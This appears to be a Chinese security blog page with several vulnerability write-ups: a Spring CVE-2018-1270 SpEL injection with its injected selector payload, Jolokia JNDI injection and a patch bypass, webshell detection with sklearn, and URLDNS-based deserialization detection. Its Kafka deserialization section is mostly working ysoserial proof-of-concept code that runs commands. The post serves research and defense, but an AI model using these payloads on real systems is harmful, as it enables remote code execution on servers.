0c0c0f 发布的文章

CVE-2018-1270 Remote Code Execution with spring-messaging

影响版本

  • Spring Framework 5.0 to 5.0.4
  • Spring Framework 4.3 to 4.3.14

漏洞分析

Spring Framework通过spring-messageing模块和STOMP代理对象通讯。根据漏洞描述可以知漏洞出现在spring-message模块 或者是 stomp-websockets模板块,下面逐一分析:

spring-websockets 模块

存在的敏感方法

@Nullable

public String[] decode(String content) throws IOException {
return (String[])this.objectMapper.readValue(content, String[].class);
}

反序列化使用的jackson组件,但是没有开启autotype功能,并且代码指定了反序列化类型为String[].class,利用jndi注入方式会导致异常,没有成功。

625fbd72201477f4d64f9b4a2e79a5a1.png

分析spring-message模块

DefaultSubscriptionRegistry类中方法addSubscriptionInternal存在expression = this.expressionParser.parseExpression(selector)(危险的SPEL表达式语句)。
根据上下文可以初步判定selector参数可以控制,但是了解SPEL注入的同学应该知道,要想达到代码执行,需要调用expression.getValue()或者expression.setValue()方法。继续寻找会发现该文件的154-164行调用了expression对象的getValue方法。

复现下漏洞的触发流程:

点击Connet按钮抓包

52b29eca6c5ea5429201c48c8ad96bee.png

修改请求报文,插入如下字段

\nselector:new java.lang.ProcessBuilder("/Applications/Calculator.app/Contents/MacOS/Calculator").start()

43ec3a11b117e9b86582d16d1922fc13.png

回到聊天窗口,发送任意消息即可触发恶意代码

c25b1fe4957ce9fcd465d867e1d010df.png

9d57f7cb1ad30ab1e747922601163798.png

586b85fa87889b1950535a76e5c25553.png

修复方案

  • 5.0.x users should upgrade to 5.0.5
  • 4.3.x users should upgrade to 4.3.15

漏洞二:xss vul in gs-messaging-stomp-websocket demo

2f1a64a5f7f2e688198fc8ffe5d805eb.png

Patch:https://github.com/spring-guides/gs-messaging-stomp-websocket/commit/6d68143e04ea1482b724c3f620688ec428089bc0

From:https://pivotal.io/security/cve-2018-1270

Jolokia JNDI Injection&XXE Vulnerability分析复现

0x01 JNDI Injection CVE-2018-1000130

1.1 什么是JNDI注入

参考:https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf

1.2 漏洞复现

Jolokia的JNDI注入问题出现在jsr160模块,根据官方文档可以很容找到注入点

6.6. Proxy requests For proxy requests, POST must be used as HTTP method so that the given JSON request can contain an extra section for
the target which should be finally reached via this proxy request. A
typical proxy request looks like

{
    "type" : "read",
    "mbean" : "java.lang:type=Memory",
    "attribute" : "HeapMemoryUsage",
    "target" : {
         "url" : "service:jmx:rmi:///jndi/rmi://targethost:9999/jmxrmi",
         "user" : "jolokia",
         "password" : "s!cr!t"
    }
  }

根据补丁信息很容易确定漏洞位置:

url within the target section is a JSR-160 service URL for the target
server reachable from within the proxy agent. user and password are
optional credentials used for the JSR-160 communication.

1.png

1.3 漏洞利用

2.png

3.png

4.png

1.4 影响

5.png

1.5 漏洞Bypass

补丁信息,可以看到增加ldap的黑名单:service:jmx:rmi:///jndi/ldap:.*

https://github.com/rhuss/jolokia/commit/2f180cd0774b66d6605b85c54b0eb3974e16f034

6.png

但是JDNI注入支持的协议有LDAP、RMI、Cobra三种,所以补丁后还是存在问题的。

7.png

8.png

0x02 XXE Vulnerability In PolicyDescriptor Class

2.1 漏洞复现

9.png

10.png

11.png

12.png

2.2 漏洞利用

由于对Jolokia不熟悉,目前还没有找到用户可控输入点。

0x03 参考

利用sklearn检测webshell

环境搭建

Window

  • 安装IDE Anaconda

Anaconda在python语言外,还集成了numpy、scipy、matplotlib等科学计算包,以及beautiful-soup、requests、lxml等网络相关包。安装Anaconda后,基本不再需要费劲地安装其他第三方库了。

Mac Install

webshell检测

NeoPI可以生成文件的信息熵,最长单词、重合指数、特征以及压缩比等,个人感觉应该比但存通过1-gram、2-gram分词效果要好。

  1. 信息熵(Entropy):通过使用ASCII码表来衡量文件的不确定性。
  2. 最长单词(Longest Word):最长的字符串也许潜在的被编码或被混淆。
  3. 重合指数(Index of Coincidence):低重合指数预示文件代码潜在的被加密或被混效过。
  4. 特征(Signature):在文件中搜索已知的恶意代码字符串片段。
  5. 压缩(Compression):对比文件的压缩比。(more info)

黑样本

tennc ysrc tdifg tanjiti

白样本

Wordpress joomla

样本向量化

python neopi.py --csv=joomla.csv -a -A /Users/0c0c0f/soft/threathunter/joomla-cms

测试代码

import numpy as np
from sklearn import tree
from sklearn import linear_model
from sklearn.naive_bayes import GaussianNB
from sklearn import svm
from sklearn import ensemble
from sklearn import neighbors

def loubao_desc(algorithm,y_pred):
    num=0
    sum=0
    for p in y_pred:
        if p==0.0:
            num = num+1
        sum = sum+1
    print(algorithm,"漏报率:",num/sum)

def wubao_desc(algorithm,y_pred):
    num=0
    sum=0
    for p in y_pred:
        if p==1.0:
            num = num+1
        sum = sum+1
    print(algorithm,"误报率:",num/sum)

training = "/Users/0c0c0f/soft/threathunter/thwebshellldetect/traning.csv"
testing_black = "/Users/0c0c0f/soft/threathunter/thwebshellldetect/tdifg.csv"
testing_white = "/Users/0c0c0f/soft/threathunter/thwebshellldetect/joomla.csv"

training_data = np.loadtxt(open(training,"r"), delimiter=",")
debug = 1
if debug==0:
    testing_data = np.loadtxt(open(testing_black,"r"), delimiter=",")
else:
    testing_data = np.loadtxt(open(testing_white,"r"), delimiter=",")
X = training_data[:,0:4]
y = training_data[:,5]

X1 = testing_data[:,0:4]

# 朴素贝叶斯
gnb = GaussianNB()
y_pred = gnb.fit(X, y).predict(X1)
if debug==0:
    loubao_desc('朴素贝叶斯',y_pred)
else:
    wubao_desc('朴素贝叶斯', y_pred)

# 决策树
dtc = tree.DecisionTreeClassifier()
y_pred =dtc.fit(X, y).predict(X1)
if debug==0:
    loubao_desc('决策树',y_pred)
else:
    wubao_desc('决策树', y_pred)

# 逻辑回归
lr = linear_model.LinearRegression()
y_pred =lr.fit(X, y).predict(X1)
if debug==0:
    loubao_desc('逻辑回归',y_pred)
else:
    wubao_desc('逻辑回归', y_pred)

# 支持向量机
svc = svm.SVC()
y_pred =svc.fit(X, y).predict(X1)
if debug==0:
    loubao_desc('支持向量机',y_pred)
else:
    wubao_desc('支持向量机', y_pred)

# k近邻
knc = neighbors.KNeighborsClassifier()
y_pred = knc.fit(X, y).predict(X1)
if debug==0:
    loubao_desc('k近邻',y_pred)
else:
    wubao_desc('k近邻', y_pred)

测试结果

  • 朴素贝叶斯 漏报率: 0.4879032258064516
  • 决策树 漏报率: 0.0
  • 逻辑回归 漏报率: 0.0
  • 支持向量机 漏报率: 0.04838709677419355
  • k近邻 漏报率: 0.020161290322580645
  • 朴素贝叶斯 误报率: 0.004206393718452047
  • 决策树 误报率: 0.2501402131239484
  • 逻辑回归 误报率: 0.0
  • 支持向量机 误报率: 0.26472237801458215
  • k近邻 误报率: 0.2526640493550196

逻辑回归检测webshell最优

参考

Apache Kafkafa反序列化漏洞

作者直接给出了漏洞Poc:CVE-IDs request for Apache Kafka desrialization vulnerability via runtime

import junit.framework.Test;
import junit.framework.TestCase;
import junit.framework.TestSuite;
import org.apache.commons.io.FileUtils;
import org.apache.kafka.connect.runtime.standalone.StandaloneConfig;
import org.apache.kafka.connect.storage.FileOffsetBackingStore;
import ysoserial.payloads.Jdk7u21;

import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.util.HashMap;
import java.util.Map;

public void test_Kafka_Deser() throws Exception {

        StandaloneConfig config;

        String projectDir = System.getProperty("user.dir");

        Jdk7u21 jdk7u21 = new Jdk7u21();
        Object o = jdk7u21.getObject("touch vul");

        byte[] ser = serialize(o);

        File tempFile = new File(projectDir + "/payload.ser");
        FileUtils.writeByteArrayToFile(tempFile, ser);

        Map<String, String> props = new HashMap<String, String>();
        props.put(StandaloneConfig.OFFSET_STORAGE_FILE_FILENAME_CONFIG,
tempFile.getAbsolutePath());
        props.put(StandaloneConfig.KEY_CONVERTER_CLASS_CONFIG,
"org.apache.kafka.connect.json.JsonConverter");
        props.put(StandaloneConfig.VALUE_CONVERTER_CLASS_CONFIG,
"org.apache.kafka.connect.json.JsonConverter");
        props.put(StandaloneConfig.INTERNAL_KEY_CONVERTER_CLASS_CONFIG,
"org.apache.kafka.connect.json.JsonConverter");
        props.put(StandaloneConfig.INTERNAL_VALUE_CONVERTER_CLASS_CONFIG,
"org.apache.kafka.connect.json.JsonConverter");
        config = new StandaloneConfig(props);

        FileOffsetBackingStore restore = new FileOffsetBackingStore();
        restore.configure(config);
        restore.start();
    }

    private byte[] serialize(Object object) throws IOException {
        ByteArrayOutputStream bout = new ByteArrayOutputStream();
        ObjectOutputStream out = new ObjectOutputStream(bout);
        out.writeObject(object);
        out.flush();
        return bout.toByteArray();
    }

咨询了下研发人员,说他们代码里面没有这个class。这个反序列化应该可以用来bypass一些黑名单。类似于MarshalledObject类bypass weblogic。

通过全局搜索在源码中的测试用例也存在有漏洞的写法,不知道这个类是否有其他的使用场景?可以一起交流下。

FileOffsetBackingStore.png

搭建环境测试:

package ysoserial.exploit;
import org.apache.commons.io.FileUtils;
import org.apache.kafka.connect.runtime.standalone.StandaloneConfig;
import org.apache.kafka.connect.storage.FileOffsetBackingStore;
import ysoserial.payloads.CommonsCollections4;
import ysoserial.payloads.Jdk7u21;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.util.HashMap;
import java.util.Map;

public class KafkaExploitTest {
    public static void test_Kafka_Deser() throws Exception {
        StandaloneConfig config;
        String projectDir = System.getProperty("user.dir");
        CommonsCollections4 cc4 = new CommonsCollections4();
        Object o = cc4.getObject("calc");

        byte[] ser = serialize(o);

        File tempFile = new File(projectDir + "/payload.ser");
        FileUtils.writeByteArrayToFile(tempFile, ser);

        Map<String, String> props = new HashMap<String, String>();
        props.put(StandaloneConfig.OFFSET_STORAGE_FILE_FILENAME_CONFIG, tempFile.getAbsolutePath());
        props.put(StandaloneConfig.KEY_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
        props.put(StandaloneConfig.VALUE_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
        props.put(StandaloneConfig.INTERNAL_KEY_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
        props.put(StandaloneConfig.INTERNAL_VALUE_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
        config = new StandaloneConfig(props);

        FileOffsetBackingStore restore = new FileOffsetBackingStore();
        restore.configure(config);
        restore.start();
    }

    private static byte[] serialize(Object object) throws IOException {
        ByteArrayOutputStream bout = new ByteArrayOutputStream();
        ObjectOutputStream out = new ObjectOutputStream(bout);
        out.writeObject(object);
        out.flush();
        return bout.toByteArray();
    }

    public static void main(String[] args) throws Exception{
        KafkaExploitTest.test_Kafka_Deser();
    }
}

Pom.xml添加依赖:

<!-- https://mvnrepository.com/artifact/org.apache.kafka/connect-runtime -->
<dependency>
<groupId>org.apache.kafka</groupId>
<artifactId>connect-runtime</artifactId>
<version>0.11.0.0</version>
</dependency>
<!-- https://mvnrepository.com/artifact/org.apache.kafka/connect-json -->
<dependency>
<groupId>org.apache.kafka</groupId>
<artifactId>connect-json</artifactId>
<version>0.11.0.0</version>
<scope>test</scope>
</dependency>

calc.png

漏洞Demo:

[@Test](/user/Test)
   public void testSaveRestore() throws Exception {
       Callback<Void> setCallback = expectSuccessfulSetCallback();
       Callback<Map<ByteBuffer, ByteBuffer>> getCallback = expectSuccessfulGetCallback();
       PowerMock.replayAll();

       store.set(firstSet, setCallback).get();
       store.stop();

       // Restore into a new store to ensure correct reload from scratch
       FileOffsetBackingStore restore = new FileOffsetBackingStore();
       restore.configure(config);
       restore.start();
       Map<ByteBuffer, ByteBuffer> values = restore.get(Arrays.asList(buffer("key")), getCallback).get();
       assertEquals(buffer("value"), values.get(buffer("key")));

       PowerMock.verifyAll();
   }

业务序列化使用avro或者json居多。如果用jdk原生方式,应该会用到这个函数进行反序列化。

低漏报检测Java反序列化漏洞方法

1、不需要目标系统存在漏洞的第三方库,直接使用JDK自带的URL类发起dns请求,dns请求一般可以出网,所以漏报应该很低。

2、工具break-fast-serial,需要自己改造下把URLDNS的payload加到里面,启动dnschef

dnschef1.png

3、DNS解析设置

dns1.png

4、测试

url2.png

result1.png

5、检测到存在反序列化漏洞的点在具体进行绕过